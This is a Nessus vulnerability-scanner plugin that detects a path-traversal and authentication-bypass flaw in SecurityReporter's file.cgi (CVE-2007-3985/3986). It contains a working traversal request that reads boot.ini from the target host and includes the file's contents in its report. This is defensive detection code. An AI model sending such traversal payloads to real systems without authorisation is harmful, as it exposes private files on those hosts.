#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a CGI application that is affected by
multiple issues. 

Description :

The 'file.cgi' script included with the version of SecurityReporter
installed on the remote host fails to sanitize input to the 'name'
parameter before returning the contents of the specified file and
supports bypassing authentication using specially-crafted arguments. 
An unauthenticated remote attacker can exploit these issues to
retrieve the contents of arbitrary files on the remote host. 

In addition, 'file.cgi' allows an attacker to bypass authentication
using a specially-crafted 'name' parameter. 

Note that SecurityReporter is also known as 'Network Security
Analyzer' and is included in products from eIQnetworks, Top Layer
Networks, Clavister, Astaro, Reflex Security, H3C, Piolink, and
MiraPoint. 

See also :

http://www.oliverkarow.de/research/securityreporter.txt
http://www.securityfocus.com/archive/1/474472/30/0/threaded

Solution :

Upgrade to version 4.6.3 if necessary and then apply SecurityReporter
v4.6.3 patch 1.  Or contact the vendor for a patch. 

Risk factor :

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)";


if (description)
{
  script_id(25994);
  script_version("$Revision: 1.1 $");

  script_cve_id("CVE-2007-3985", "CVE-2007-3986");
  script_bugtraq_id(25027);

  script_name(english:"SecurityReporter < 4.6.3p1 Multiple Vulnerabilities");
  script_summary(english:"Tries to retrieve a local file using SecurityReporter");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 8216, 9216);

  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:8216);
if (!get_port_state(port)) exit(0);


# Try to exploit the issue to retrieve a file.
file = "boot.ini";
req = http_get(
  item:string(
    "/cgi-bin/file.cgi?",
    "name=/eventcache/../../../../../../../../../../../", file
  ), 
  port:port
);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
if (res == NULL) exit(0);


# There's a problem if looks like boot.ini.
if ("[boot loader]">< res)
{
  report = string(
    desc,
    "\n\n",
    "Plugin output :\n",
    "\n",
    "Here are the contents of the file '\\boot.ini' that Nessus\n",
    "was able to read from the remote host :\n",
    "\n",
    res
  );
  security_warning(port:port, data:report);
  exit(0);
}
